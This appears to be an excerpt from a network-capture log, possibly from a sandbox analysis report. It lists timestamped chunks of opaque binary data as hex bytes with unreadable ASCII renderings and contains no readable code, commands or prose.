                                                                                              2021-12-07 12:39:07 UTC797INData Raw: 9a 59 36 bf 41 ea 44 4a 6a 19 d6 89 ae 28 98 47 89 9e 64 5c 61 fb 72 f9 2f d2 9f b8 5c f2 f7 8c b2 7b 68 0f 0c f5 a8 56 08 ae 94 50 3c c7 56 f4 47 42 33 5b fe 8f c4 4a 21 03 18 9f d1 67 76 7b 3a 58 f8 17 ff df e6 86 86 11 80 e4 b1 12 03 b0 d7 50 2f e9 bc 5b 0a 7d 1b 20 01 3f 2d ef 22 aa 7c 34 ce 1b 54 d5 db 93 be ee 81 61 30 5c 31 00 d0 b6 ad 36 c3 c3 2d fa 28 e9 62 dc 98 6a a8 81 98 42 38 6f 9f 76 16 29 02 46 47 d8 4f 85 4b b6 78 8f b5 57 35 31 85 03 a1 ac fe 5e 6b 80 c5 90 4c 34 b6 bb 3f 7b 89 a0 84 d2 21 e7 9f d0 25 a4 7d 46 73 e6 56 32 40 c4 2e 0d 94 0d ee 9f 83 95 71 ac 84 c4 ce 09 5c 48 a8 5e c2 52 46 f6 67 bf 5d 27 a0 25 72 f7 dd 51 40 2c 32 26 3c f5 91 cb 44 ed ef 96 a7 d6 d9 ae 17 72 9c 8d 7c 7b 12 1b e6 43 49 eb 78 4a df 3b 8e 51 be b1 a2 ad 13
                                                                                              Data Ascii: Y6ADJj(Gd\ar/\{hVP<VGB3[J!gv{:XP/[} ?-"|4Ta0\16-(bjB8ov)FGOKxW51^kL4?{!%}FsV2@.q\H^RFg]'%rQ@,2&<Dr|{CIxJ;Q
                                                                                              2021-12-07 12:39:07 UTC805INData Raw: d4 8a af 4d 35 cb bb c4 ae 75 c3 0d 7e 96 47 2c 35 2d ff 9c 2a 9d 9f 9d 82 f7 70 82 3b 78 e4 6a 83 35 87 6e 44 44 dc cb f5 81 2f dc d3 3d 55 83 01 8c dc fe b6 d3 b3 8b 06 4d cd 43 d1 09 9e 09 1e f3 63 6e f8 e5 14 79 7b a0 ad fe 18 ca 03 62 de 7f 4f a8 fc 88 37 45 0a 00 6c 3f f1 73 ad 13 34 55 25 03 9c bb fe a1 ef c3 db 40 16 94 fa 6f cc 1c 2f f3 a5 b4 e3 92 0f 82 17 b9 97 a2 91 f4 f1 5a cd a2 47 b8 78 22 1d 91 08 5e ec 01 9e 56 2e 14 59 a2 c0 a6 64 34 66 47 7b 5d 25 2a 8c 7b 93 3d 6e fe f5 03 d1 6c e4 4b e9 2a 4a 73 cd d8 a4 07 76 78 e2 2d e6 00 d5 e8 3e 90 d2 7f 8e b6 fa 9e 7d cd b8 4c 63 fd ea 87 06 4d 9d 1a bf 72 3d f3 18 4d 94 b9 87 43 4a 2e a8 44 19 bb 7d 14 d8 90 9a a6 0c 6a de 9e 65 cf af 89 ff 42 87 74 6e 3c b4 56 79 41 a5 30 b1 c9 3d c6 cb af 8d
                                                                                              Data Ascii: M5u~G,5-*p;xj5nDD/=UMCcny{bO7El?s4U%@o/ZGx"^V.Yd4fG{]%*{=nlK*Jsvx->}LcMr=MCJ.D}jeBtn<VyA0=
                                                                                              2021-12-07 12:39:07 UTC812INData Raw: 9e 3e 0b a0 79 7a 74 f7 e0 0f 02 18 43 4e b7 29 7a a9 e2 5f 9f 88 47 20 d7 1a e9 e7 dd 7c 98 4a ed d6 5e ff c4 2a f2 19 7d 31 0c 7d 8c b1 3d 02 d3 a2 2e 4e 46 cb f3 b3 61 9c fa 00 14 a7 86 89 ac b5 a2 f7 28 5b f9 ce 0c 85 9d 41 ee 9f cc 31 05 62 52 67 17 2d 44 c5 7b c1 80 cc 60 77 3c 68 44 c5 f0 e0 d5 a4 b8 28 6f 31 59 2c 96 45 90 36 44 35 fc 8b aa 49 11 b4 6a 88 10 ac 2e a2 64 7e a9 1b a6 aa d4 a5 d5 b3 2a c3 ad ca 77 2f dc 8d 59 86 c3 a4 80 27 eb ff 06 2e 2f 21 ae c3 82 70 66 44 42 6d 82 c6 2a 8b 12 de 8a 79 11 ff dd 1b 8e cd e0 38 9b a3 60 0f 2a df 28 d0 81 c2 f1 ed e3 ac be de 73 1a 85 42 dd a3 bd a3 a5 a2 6b f9 9a be a2 a7 de b2 c3 27 ad f4 c3 7d d3 b5 11 12 01 35 59 37 dc 15 7a dc 76 b7 88 d2 99 e8 9d 79 83 90 ce b3 53 70 fd 91 38 63 d1 c1 f8 12 13
                                                                                              Data Ascii: >yztCN)z_G |J^*}1}=.NFa([A1bRg-D{`w<hD(o1Y,E6D5Ij.d~*w/Y'./!pfDBm*y8`*(sBk'}5Y7zvySp8c
                                                                                              2021-12-07 12:39:07 UTC820INData Raw: 7b 15 1b 0c 40 b7 27 cc 04 ca 36 51 b9 70 14 8b 6c d9 25 28 c2 93 8c 5f fc fe 3d af 18 85 7c fa 51 52 6b 56 f7 17 2d 11 01 65 f1 78 ea e5 8f f4 c5 42 6c ef 3c 85 94 cd 6f 3f 12 75 45 5b b8 8d 63 04 44 cd 98 c6 a8 19 54 b2 99 33 01 36 19 13 03 6f 71 b5 45 fd 3c 17 96 20 af a9 9c 97 25 71 44 e8 fb 34 fa 9e 73 d2 ef d8 9f 24 ac af 20 b8 13 11 43 57 4f 4b c6 d3 d7 23 e3 0f 3e 94 7d d1 85 39 4f 01 3b 3f 14 ad 2a 68 29 22 fc 08 d8 a1 2e 58 dc 28 77 6b e1 ca 43 b4 24 d8 ab ee c3 6f 94 ed f1 f3 29 31 6c 8f 06 63 b1 58 f1 1a f2 8c 8b 05 fa 6e 18 67 ba 4d 7e cc 37 2f 12 5f b1 74 f2 24 b7 c8 c5 c6 3b 24 86 39 22 b2 1a 15 98 4c 5f 1b c7 31 72 2c b3 6a 0b 6e 96 28 2e 74 06 2a e4 3f 64 8f 65 78 f4 d6 6a c2 d0 83 a2 a7 04 dd 2d e2 71 1e 5a 59 d7 6a 51 26 8f 56 c0 43 88
                                                                                              Data Ascii: {@'6Qpl%(_=|QRkV-exBl<o?uE[cDT36oqE< %qD4s$ CWOK#>}9O;?*h)".X(wkC$o)1lcXngM~7/_t$;$9"L_1r,jn(.t*?dexj-qZYjQ&VC
                                                                                              2021-12-07 12:39:07 UTC828INData Raw: 1f 1e 57 f7 8b ff 83 ba ab 94 dd f0 b8 ba 9f fe 43 eb 1e a6 b4 ed 55 c9 75 f7 8d 4a ae 3b 3c 86 1a 74 8f a1 d6 d9 64 ff 5d 25 dc 79 ce b3 e8 62 6d ac 05 b7 87 63 7d 4d e4 47 4d b3 af 90 46 55 17 c7 99 66 33 8e 77 52 76 f3 aa 34 ec 4b 18 6d 4a 8e de 08 e9 28 cc 9a e4 28 8c d3 66 51 da ac 68 5a cd 88 4e dd 94 23 1a b1 4f 36 82 a2 c7 f9 24 1d 45 29 3f f7 8b 46 fc da 1c bb 12 3c 7d f4 df 1f 89 3c ca ee d7 7e 7d 09 41 3f 06 2f 4b 1c 09 6b cf 23 51 48 69 e7 ea 69 a3 23 11 ba ac 07 28 92 3e 4f 2f f1 cb a5 68 1e a5 1e 2a de da f7 c5 79 b3 3d 70 44 36 e4 df f0 c0 16 b3 2e 2d b8 2c ba 2e 91 b1 57 c0 aa c3 f1 02 2a 74 e3 7d a2 d0 d9 26 b9 17 ab de 67 af 7a da 10 bb be cf 8c ab 41 7e d4 85 d0 15 d2 da ec e2 38 17 42 dc 1d 2b 28 ef c2 fb a2 d6 34 45 ea b8 4b f5 ae 3c
                                                                                              Data Ascii: WCUuJ;<td]%ybmc}MGMFUf3wRv4KmJ((fQhZN#O6$E)?F<}<~}A?/Kk#QHii#(>O/h*y=pD6.-,.W*t}&gzA~8B+(4EK<
                                                                                              2021-12-07 12:39:07 UTC836INData Raw: d5 47 da b9 15 aa 17 7d a4 07 51 8c 8b 3f d0 a4 b6 d1 ea 9e 19 53 5d 79 3c f3 e9 c9 d5 5d f7 d1 c9 ab fb e8 37 a2 ba 83 19 fc b1 aa 1f 3b c7 17 c7 21 33 49 12 40 fd d3 fb 12 3a 6c d0 8f 63 3d 1b f5 f9 0f f5 b2 24 0f 53 1d 21 ca 62 21 44 e2 46 81 4f 2b d3 e7 29 0a 0f bd 13 6d 21 e0 71 e3 3b f1 f0 38 46 2b d1 29 f2 ce f8 b0 c7 31 1b f8 54 4c 27 60 72 4a f6 2d 61 c9 0e 9e a5 34 15 5d 05 61 71 a4 40 0c 26 58 f0 aa e6 62 3f b4 9f 60 97 16 28 2f c1 ee 80 4b 7a 84 dd 27 00 ab 97 be 0d fb e3 66 83 a3 15 f7 0f 9b e3 61 97 e1 35 a3 67 fc b6 57 c7 6f 93 de 61 78 1d f5 4e 4f f8 ed b1 8b a3 f8 ed f5 bf 8b 29 fc 42 8f f8 ed ee 8b 4f 82 df 4a 2e 8e c3 6f 4b 65 2e 77 26 e1 b7 8b 2e 96 d8 68 2d 9f ff 79 f1 7f 1d bf 1d b8 48 e6 b8 9e 72 7c eb a2 ff 1a 7e 0b 5e 74 52 fc d6
                                                                                              Data Ascii: G}Q?S]y<]7;!3I@:lc=$S!b!DFO+)m!q;8F+)1TL'`rJ-a4]aq@&Xb?`(/Kz'fa5gWoaxNO)BOJ.oKe.w&.h-yHr|~^tR
                                                                                              2021-12-07 12:39:07 UTC844INData Raw: 81 1b 6e b4 1d a9 b7 78 fb f9 77 5a 02 37 da 82 13 9c 65 a6 59 a1 d1 4c 31 f8 86 a3 da 53 d5 b4 33 05 3d d9 2f 92 d2 49 0b d7 db 54 e1 50 26 66 98 15 8c a6 90 ad 72 a7 01 12 05 24 a6 81 99 93 1e 98 60 0d a4 06 56 5a 12 46 fa a7 67 52 37 70 cf 95 a8 cf 74 f3 48 db 3c 15 d4 0b 67 9e 49 32 18 ac 72 e8 05 22 d3 44 2f 0c 54 4b 06 e9 bd b0 f2 1b ee 85 d0 0d 39 b5 b9 d0 65 a5 08 de 8f 02 e5 56 b0 dd 88 89 1c 98 dd 3d 5d 55 cf 61 96 33 b4 4c a6 02 87 4f 57 27 a0 99 b4 9a b6 4d 2f 51 7f 7d 0e c1 79 46 5c 9d ea f9 d0 7a 0c 4d 9b 42 19 f5 e7 3a 31 25 11 47 fe 7a 7e 7e 2d ea 68 d3 b8 8e cb cd fa 1a d2 91 e9 bf ad d5 90 53 3b 3d 88 a1 ed 35 f3 f0 f3 b9 6e 27 06 ef b7 03 f5 6a 37 76 89 c1 db 41 e5 95 3b 48 f4 04 2a 34 03 f3 24 5d 5d 16 8d b6 41 46 5b 2f dc e8 8f a3 83
                                                                                              Data Ascii: nxwZ7eYL1S3=/ITP&fr$`VZFgR7ptH<gI2r"D/TK9eV=]Ua3LOW'M/Q}yF\zMB:1%Gz~~-hS;=5n'j7vA;H*4$]]AF[/
                                                                                              Data Ascii: 6x8h;eqTlF/eUs6`?nmw45j2&<.)/5J3|Qx&xV=NyX`zXVZ@U_|knt~H"L8o^D2ZUq+Z}N_f(lmc@n
                                                                                              2021-12-07 12:39:07 UTC1133INData Raw: df 64 33 49 80 f9 1f f1 71 87 3d 60 e8 1d d8 7f 2b d3 60 7f 94 50 bc a0 4d 97 aa c5 b8 63 28 37 56 41 57 27 7f 10 4e 9c 75 60 ba 52 81 e5 9d 4b be 79 a5 88 c8 37 b4 0c e4 5f ea ec e1 4e 86 8f 5e 6c 62 f3 72 01 fb 7f 9e 97 65 94 6e 02 4b 9a b5 f7 d8 81 fa 3b be 9e 8a a2 4d 9b 2f 87 db 75 ed 05 05 7d 4f fd c8 7f cf 14 d2 8a 52 02 ce 1f a8 bf 33 89 b8 fd 34 75 f2 67 6f 5a 4f df f8 2f 2c f3 df 5a 89 89 53 71 15 4d 87 36 1f f9 0f 04 40 fe 83 99 e7 5f 89 e0 fc 8f f3 f7 47 a3 d7 33 30 ea fa a9 63 f0 4d 6a 52 32 5d d9 b2 3b bc 8b 70 0f 2c 67 bc 2c 41 fe a9 ed 15 2f e2 82 4c 08 c8 ff 48 0b 71 83 38 b9 78 24 5d 76 ff 61 97 cd 1d 9c 8d 5c 69 21 19 5d 79 8d 32 10 d4 52 33 c6 79 c2 44 e1 bd 2e 64 26 a5 eb 4c f6 93 6c 05 ee e7 58 9c 75 55 ad e4 92 a0 48 3a 32 b0 ff 77
                                                                                              Data Ascii: d3Iq=`+`PMc(7VAW'Nu`RKy7_N^lbrenK;M/u}OR34ugoZO/,ZSqM6@_G30cMjR2];p,g,A/LHq8x$]va\i!]y2R3yD.d&LlXuUH:2w
                                                                                              2021-12-07 12:39:07 UTC1141INData Raw: 8b ef 71 c6 b9 80 ce 15 86 bb d2 df b5 8b 71 e2 bf ef 3f ce ce b8 b2 03 f7 7f b4 f6 f3 04 da 94 f7 46 12 bf 7f 48 d5 96 f1 89 38 f6 c8 0f 33 17 cd f2 f6 92 8a d5 e2 86 a2 be 90 aa a7 e5 5d aa 5d da 64 ad db 28 c6 68 31 9f 3d 73 34 83 2f 12 db 4b e7 0f 6f 34 f4 9b c8 75 43 fd 7f 7f db 8a 77 fe cc 88 d0 cb d6 b3 52 7c db 41 2e ca 6f cb db 45 c8 47 09 d3 b2 86 7e 4f e1 fb 7f f7 d3 9b 26 33 a3 cd 8d 4b b3 2a 99 1b 66 cf f5 10 1b af 3f 60 0b ee 1a 53 b6 cc 54 bc 78 2e b2 6e 73 90 fc b1 00 33 3b bf fd fd 05 af fe e2 43 14 b1 f6 fb 33 0a ab ed c6 73 1e 1e d5 7b 34 5e ad fd 43 e7 96 f6 6b f2 d7 2f a5 28 06 ce cd 7e 5f b3 dd c3 6b 18 6a c2 4e 25 9b 84 4b a4 13 3b a0 d2 23 89 b6 83 ef 9f e0 fd 8b c8 27 46 0e 92 1e ba 79 cf 44 44 7d 67 41 ff 57 bb 77 cc 3b fd ea 54
                                                                                              Data Ascii: qq?FH83]]d(h1=s4/Ko4uCwR|A.oEG~O&3K*f?`STx.ns3;C3s{4^Ck/(~_kjN%K;#'FyDD}gAWw;T
                                                                                              2021-12-07 12:39:07 UTC1148INData Raw: 66 81 66 dd bf f5 3f af 6d 0a 49 ff d3 53 44 92 f4 3f d3 fd 44 44 b1 a0 20 2a 36 6e d3 20 31 27 ab 8f b0 46 40 86 1e 11 31 f6 cf ed 36 3f bf e5 4f d2 7f 3c 8e c3 b1 89 cf 69 62 25 c9 4c d0 9f b5 30 83 3f df 2c 61 ab 78 46 7a b9 92 74 a0 8e d4 ff 5b ff 5b f4 6d 93 f4 9f 70 b1 88 54 a8 09 8e a1 82 cd 55 cc e5 92 90 2f 79 0d ce 30 01 f8 29 81 bf 0e f4 0f 39 f0 bf 03 7e 35 d0 ff 47 81 bf 0a f8 31 a0 ff 57 81 5f 00 f8 89 fb bf 79 c0 6f 04 fc 0f 21 ff 7d 06 fe 83 c0 1f 02 fa df 1e f8 15 80 df 1d f8 b9 80 ff 06 f0 d3 81 fe 59 86 fc 8f 80 f8 f7 82 fa e7 13 d4 3f fb 81 ff 3b d4 3f 57 20 ff 33 42 fd 93 06 e7 9f 21 f0 9f 84 f3 8f b8 ff a5 06 f5 8f 1d f0 67 40 fd 23 09 f9 2f 1b ec 8f 84 fa 87 0f f4 af 34 d4 3f e5 10 ff 67 a0 fe 99 05 7e 0d b0 bf 38 9c 7f 1c 60 7f 1d
                                                                                              Data Ascii: ff?mISD?DD *6n 1'F@16?O<ib%L0?,axFzt[[mpTU/y0)9~5G1W_yo!}Y?;?W 3B!g@#/4?g~8`
                                                                                              2021-12-07 12:39:07 UTC1156INData Raw: 50 01 7f e5 3b 84 96 3a f0 2b e7 13 a8 9d 81 9f 23 26 2a a8 18 f8 6f d7 51 30 49 01 bf b0 99 be f6 47 e0 3f 1b d2 28 3d 0a fc 22 8e 23 b6 e5 c0 2f 4a db d8 dd 09 fc 5e 60 7f e2 fe c3 a5 0b 1d 1a df 81 df b3 99 57 f4 02 91 bf 4c c8 17 07 fc 57 c0 fe 8d c0 cf f9 3a 85 be 8f 38 ff e5 8b 94 c9 03 fe e9 c3 89 88 3c e0 3f f7 71 d3 20 1f f8 95 a8 09 48 79 e2 fc b7 b2 db 9c 0b f8 59 ee a0 fc 11 c0 4f 09 fc 3f 88 f3 ef 37 98 41 7b 22 ff dd 91 5e 79 e0 b7 8a d7 27 d3 02 fe 56 23 a9 d5 38 e0 0f d0 21 a0 9c 81 7f 3f 12 c7 90 0f fc 5e cf 84 7c 15 81 ff 18 c4 7f 36 f0 27 e8 28 eb d2 00 7f c9 8a 96 49 16 f0 c7 36 25 22 a6 80 5f d4 10 a1 75 11 f8 65 c7 08 d4 87 81 7f 8f 7b 54 50 1c f0 f3 02 3f 2b f0 bb f7 eb 6b 73 00 7f 59 65 a3 b4 0e f0 f3 2c 8e d8 ee 02 bf d4 a7 c6 6e
                                                                                              Data Ascii: P;:+#&*oQ0IG?(="#/J^`WLW:8<?q HyYO?7A{"^y'V#8!?^|6'(I6%"_ue{TP?+ksYe,n
                                                                                              2021-12-07 12:39:07 UTC1164INData Raw: d8 12 bb 15 24 3a f8 7c 25 f9 43 7a df 4e 8b 78 27 ed e9 ce d1 df f6 0f ea 34 c7 ca cf b1 f4 06 0f fd 64 a5 ca 6b 2f eb a7 75 68 b7 53 8a c5 76 56 fe 6f 75 ff 79 62 69 04 ad b0 81 b2 ef c4 0d a3 b7 65 54 eb 0a f4 94 bd 57 7d 2e 8f dd 8a bc f2 db ff 4b 28 d9 b7 d4 2e 15 0f 1b 59 ff ba bd 70 4e ff 6e 1e 2d 0e 31 4d f3 90 51 78 f6 7f f3 fb df 19 e6 0a bf 68 c6 20 33 82 be 27 da 4b dd 5c 9c 56 a2 9e 6e b0 16 94 bd bf c4 ff db fe 73 86 d6 bb 54 e4 c3 fc 73 67 a4 16 a9 b4 5b d6 39 0d 1d e2 71 0f 38 cc 92 8a ff f7 e0 df b5 d9 89 a0 75 70 9a df 55 4e 59 9d 3c 52 fa f1 c2 54 e7 2b fd f0 ce b3 c6 b1 bf f9 65 1f 7a d3 47 d3 ff 8a 0c d5 ac dd dd 0c 6f bf 7c c8 e0 97 e9 a1 57 5c c5 b1 21 ff df c4 ef b6 d7 83 c4 1f 92 24 e4 bb f6 87 9f f6 5f f8 2f ff 0f fc be 27 2d ff
                                                                                              Data Ascii: $:|%CzNx'4dk/uhSvVouybieTW}.K(.YpNn-1MQxh 3'K\VnsTsg[9q8upUNY<RT+ezGo|W\!$_/'-
                                                                                              2021-12-07 12:39:07 UTC1172INData Raw: 7a 59 46 ce 2a a2 49 c8 06 e8 ff b8 68 24 8b 59 47 6b 33 a4 a3 0d 25 e2 68 ce 97 d6 1d bd 48 d6 83 b7 b5 fd 09 fd ff c4 9d 9b ba 7b 47 cd a1 fe 31 5a 14 59 9c 81 fc 57 e0 b5 37 7e d3 b5 12 fa 5f b9 a6 d0 ff 9c 9f 84 f9 cf cb b9 cb 9f e5 57 d4 40 ff 79 fd ea bc 75 12 f8 53 de b5 2f 13 ed 5f 09 f6 af 97 ff c4 3b c7 b5 b2 50 77 f6 85 42 9e 5d 3f 92 6c 0d e6 bf 63 af d4 e7 19 a0 e0 01 fd 77 31 79 08 ce ff b0 ab a0 ff 2f 36 5e e1 12 3b a4 4b 7e e1 e6 2b 88 ff 7d d9 ec d0 ff 2c a6 34 74 90 60 11 4e c5 6c 8a c5 08 8d 0c 34 92 91 fc ff bd a0 fa 3b 46 f9 2c f9 ed 46 2e d0 bf 27 d3 e9 68 3b ba f5 65 d8 6b cd ee 41 ff 73 c1 49 97 8b 0e fa 3f bc 52 5b fe e9 f0 fe 43 8d 07 d5 cd 13 99 f7 7f 1c 84 f9 cf 1e 83 ec 98 3b 35 e3 45 0d 31 12 9e 83 b2 77 a2 e0 fd 97 d3 1d 91
                                                                                              Data Ascii: zYF*Ih$YGk3%hH{G1ZYW7~_W@yuS/_;PwB]?lcw1y/6^;K~+},4t`Nl4;F,F.'h;ekAsI?R[C;5E1w
                                                                                              2021-12-07 12:39:07 UTC1180INData Raw: cf 0d e1 18 52 5a 6c 7f cd ca 01 e2 7f bd 56 38 88 7f b3 8f 41 ff 77 f1 10 e3 b5 5b 04 0d c0 ff e7 fb 00 ff 77 d1 24 6d 01 f2 ff b2 36 c0 7f 0a 64 86 02 b1 35 4a 9f 39 4b 03 ff 5f ec c3 ff 7f f5 31 74 f0 fe 6f 6a 8d c0 fc 23 62 13 c0 3f 1e a5 a5 17 0f 42 19 de a8 4e 4c f4 31 40 01 fe e1 35 3e 99 86 e0 24 cb 08 ec 97 3a 01 f6 bf 8a 83 eb df b4 e7 0c 18 24 92 b7 b6 01 fe cb 58 32 40 09 f8 4f a3 85 48 4d cd d8 1d 9d 35 c6 ce 5f 6f 94 d8 bc 05 3d 11 7b d7 64 c1 d1 20 de 2b 80 7f 0a 06 3f 9b 49 bc c3 3f fd 8a c7 e2 d8 57 c7 0e df 82 f9 a7 94 c4 e0 a8 92 d9 77 28 cb 14 3b 4c b1 d0 91 46 78 ff ab 05 8f 7f 85 f0 f8 37 f0 99 1c e0 7f ff e4 7f 51 c8 dc eb e8 65 b2 bb fc 4f 4f 7d 24 f8 f3 6f fd d3 1d c0 41 7e 60 f4 42 d4 6a 63 33 85 3c 2e 4d b1 26 e5 2d c0 3f e0 ef
                                                                                              Data Ascii: RZlV8Aw[w$m6d5J9K_1toj#b?BNL1@5>$:$X2@OHM5_o={d +?I?Ww(;LFx7QeOO}$oA~`Bjc3<.M&-?
                                                                                              2021-12-07 12:39:07 UTC1187INData Raw: fb 27 f7 9c 40 ff 1f 0c fa 1f 08 fc fe c5 3d 49 f3 75 80 ff ce ff fb fe 07 de bf ee bf 40 00 fe 2b f2 f7 fe cb 0c 32 e3 c7 7f df ff 00 f8 6f fa df fb 17 b3 ff 71 ff e5 83 32 b8 7f 03 bf ff 82 27 33 61 a4 fa bf b8 ff 42 82 73 b7 ff 9d ad 6e 1a 92 f1 7f e5 fe 4b 60 2d de d1 7f dc 7f b1 1a 65 42 fd fd 1f f7 5f 64 07 ac 92 5d 81 fd 59 e5 a0 fe 0d 02 fb 2f 7c 40 ff f7 f2 bf ef bf 58 04 98 2e e2 a7 53 96 b3 02 fb 99 c1 fd 3b 88 04 b0 ff 10 d8 8f fb df f7 6f 3c 1a 16 0c 7e a0 58 26 77 b6 bd 1b f8 06 c7 bf fd 81 fd d9 e0 fe 47 cd 7f df bf 41 60 0c d6 fc df dd bf c1 f9 7b ff a6 18 f8 3f 4a 9b 33 a1 d7 d7 69 98 83 26 6d e0 fa ff c9 fb 37 08 2b e6 43 a0 fe 9f cc 97 27 c0 5b 2d fd 7b ff a3 6e cc 6f 7b 95 b7 ea 91 3e 29 b0 ff 69 b2 1f 7d 16 7a 3b 22 52 20 6e 1a e7 3d
                                                                                              Data Ascii: '@=Iu@+2oq2'3aBsnK`-eB_d]Y/|@X.S;o<~X&wGA`{?J3i&m7+C'[-{no{>)i}z;"R n=
                                                                                              2021-12-07 12:39:07 UTC1195INData Raw: 11 a9 92 1d 4a f5 69 78 b7 4e e5 de ab ec 45 0d 3c 17 6d b4 8e 41 0e c6 29 dc 60 ed 90 97 05 d0 12 fa a2 b6 0f ab aa de a3 83 b0 42 55 c3 35 22 79 4b 77 e8 d3 47 59 86 f1 78 6c e1 c8 a1 4e c3 cb cd 79 d3 73 83 6c 88 65 72 b4 52 a9 3b 38 15 07 9f 12 7e 9a 94 4f 6f 2a b7 56 af d3 76 fe fa 44 89 45 70 bd 8f 2b 32 30 cd a3 49 d7 c8 96 04 35 ea b5 ff a5 c8 e6 c4 cc 8c a9 bf 6c 8c 6c 83 9c 6a 1c e1 5f 7c 3a 7b a6 c5 cd 96 86 7c 73 a1 f0 c0 d4 2f 84 b5 16 f3 c5 2c 47 e0 97 19 ce df 7e f4 cf c1 b4 e9 0b 66 ea b4 93 fb 0f f3 1c 6b 7f c7 a6 7f ad 9c 26 97 21 12 1d 52 e2 fd 13 2b 98 f4 48 f3 ab 86 77 3c 83 e9 3a 2a ec 19 ce c4 f1 53 bb fb b9 73 4c db b9 25 19 56 a6 56 e6 df d7 1a f9 0e ec 8f c6 dc 72 2f 67 56 1e 9b 55 df 54 9a 25 cc 37 4d e9 fd 02 f5 bf 48 c7 02 01
                                                                                              Data Ascii: JixNE<mA)`BU5"yKwGYxlNyslerR;8~Oo*VvDEp+20I5llj_|:{|s/,G~fk&!R+Hw<:*SsL%VVr/gVUT%7MH
                                                                                              2021-12-07 12:39:07 UTC1203INData Raw: cc 65 be 7b 38 f3 58 36 06 3d 58 86 c6 ae f0 9e ea 49 67 d5 79 19 48 84 32 9f 85 fc b0 c2 b4 d9 a1 71 21 30 42 7a c7 ca d4 e3 e0 da 44 23 ee 51 5b d2 aa e1 08 f4 3f e5 73 63 49 d1 b8 dd cf 0f ab e9 82 79 87 30 c0 bc ca a3 20 6c b4 ae ec 0c 7b bf 12 a9 08 d9 92 8e 70 fe d9 df 1d 68 ec e9 df 8f d6 20 08 f5 59 b4 ab a6 82 d6 df f2 7a a5 b5 fb cd 34 54 b8 de 73 39 ff f0 63 fa 83 e7 e3 e7 84 e0 17 24 bb 7a bc 31 56 b1 6f 85 1c f2 d6 24 a3 22 49 3d 8d 5e ab ed 73 be 1b 12 d7 27 26 7d 06 c6 52 41 61 ca cf 0f a8 b8 1e e1 66 fa 1f 0c f9 5b b3 18 27 ba 94 c6 49 ad e6 bb 73 dc de 4b e6 33 6d 18 bd fc a7 fe 5b 4d 94 4c 11 eb 23 d4 a0 4f 37 49 da 73 32 21 57 98 ae d0 2c 7a c5 61 5a 1f 9d 50 f1 31 f5 cc 46 64 be 91 66 3d ab 70 20 28 07 c1 c1 63 2f e9 b2 ca ac a7 37 cf
                                                                                              Data Ascii: e{8X6=XIgyH2q!0BzD#Q[?scIy0 l{ph Yz4Ts9c$z1Vo$"I=^s'&}RAaf['IsK3m[ML#O7Is2!W,zaZP1Fdf=p (c/7
                                                                                              2021-12-07 12:39:07 UTC1211INData Raw: 78 08 78 5f 5f dd 22 6a 0d 1c 83 fc 4f 47 f7 d6 9c d7 f0 ac c5 8a a3 cb df 88 64 3f f3 f2 9b fc a2 86 02 c8 ee fe fb 2f 29 ec 1d 98 58 5e 32 d5 17 53 34 51 48 79 95 9d 65 4e 60 fe 65 b0 f7 14 99 f9 8d 8d 7e 2e 19 79 e6 42 57 70 d8 3a 13 86 90 bf fb ed 9e 39 05 09 45 3e 17 5d 5c 9f e1 cb b7 bb de 03 9b 09 55 6e a4 64 90 d7 68 a0 f3 49 40 e4 fc c7 00 5b 34 67 11 a5 1a f8 cf 2b ab b4 a7 55 af c8 a2 67 7a 3b fd 89 df 5f 75 f1 b7 67 97 cd 7d 3c ce 24 9b 1b ec ae 7e 90 3b 40 b6 15 72 42 fc 5a 15 82 3e 40 5b 39 a1 5a 41 31 0b de ff 2f f3 8d a3 2f 46 3c 3d ac de 35 82 ff bf 63 dd 34 6f 8f 74 f7 aa 62 25 aa 8b 7e c3 27 a7 9e 49 37 54 47 99 9c ac ea 40 4b 40 79 e0 47 0e 17 d5 a8 52 c6 a6 ff 80 71 08 52 eb 80 a3 ce af 90 8b ad e6 8b 5f dc e0 fc b3 44 01 f8 57 74 2c
                                                                                              Data Ascii: xx__"jOGd?/)X^2S4QHyeN`e~.yBWp:9E>]\UndhI@[4g+Ugz;_ug}<$~;@rBZ>@[9ZA1//F<=5c4otb%~'I7TG@K@yGRqR_DWt,
                                                                                              2021-12-07 12:39:07 UTC1219INData Raw: 86 1a 4c be cf 7b 5b 58 50 5d 55 68 59 e2 59 3c 91 60 c2 b1 57 0b 35 e5 a7 0c 9a 95 cf 48 c0 f3 ac 61 96 9c 05 7e b6 39 f1 67 2d 6b 0c b6 f9 91 a3 8a ab f0 77 3a 97 e6 80 b7 b1 b8 58 a2 5f fc fa cd be d8 0a 2f 5a 26 5f 86 75 39 85 7e e0 80 15 ab d3 6b 99 88 d8 d1 61 56 a2 dd 6f f5 5a 3c 93 55 d8 f8 0e 37 60 fe 5d 56 a3 a3 16 86 51 19 e4 3f ea 0e f4 82 7f f1 96 85 83 ef bf 48 71 ef e4 71 e8 92 7f 4e 51 75 e4 7b 19 dc c6 48 f4 5c 93 98 56 01 f7 aa 61 75 4d 33 bc 07 ea 2b 0b ac fc 9d c8 e5 d6 da c7 9d 5b af 7b bd a3 ab cc 1b 28 8a 98 19 c7 e5 bd 20 e0 3f 2c 72 4d 32 97 f1 d2 fc dd 34 2a 31 d9 26 2b 07 fc 63 c0 ff 1d 74 fd b1 1b 52 f3 1e b1 d3 35 bd 3b 86 00 d7 81 c3 73 eb 8e 00 f0 ff 9d 59 45 29 26 b4 4f c3 7a dc 61 29 48 9d 79 81 ff 07 3d 01 df 0f 0f ff 0f
                                                                                              Data Ascii: L{[XP]UhYY<`W5Ha~9g-kw:X_/Z&_u9~kaVoZ<U7`]VQ?HqqNQu{H\VauM3+[{( ?,rM24*1&+ctR5;sYE)&Oza)Hy=
                                                                                              2021-12-07 12:39:07 UTC1227INData Raw: 8c 9a ef 26 66 1a 05 f5 1f a1 a7 43 15 a5 07 35 29 51 8f 16 d5 2a c5 35 ca af 86 4e a4 41 f1 1a fd 74 2a 5f 19 4b c5 09 6e 4a 2a 28 92 c9 7f 51 33 26 f3 ee a4 63 47 0b 4e d9 1e b7 81 fc eb d6 3b 5d 16 93 73 8c b7 b2 7f d4 6d 42 5e 44 35 90 31 c1 80 f9 f7 ba 6b 4c d4 0d 2b 4d 9c 29 39 b9 fb 64 0d af a5 fc 9e 6b 66 97 e3 2e fd 6d 54 39 47 da 66 73 65 2b d3 85 9d c3 67 ff 33 fd dd 95 73 7c b8 e2 5e db 52 cd 78 07 69 a3 5e a0 a6 53 90 78 07 2a 0d c6 27 3e ce 21 25 4a 59 5e 5d b6 85 26 b5 85 40 38 e2 83 62 e6 3d 5e 47 9f a5 fb ac 05 9d b7 31 9e 2c 6b 7f c4 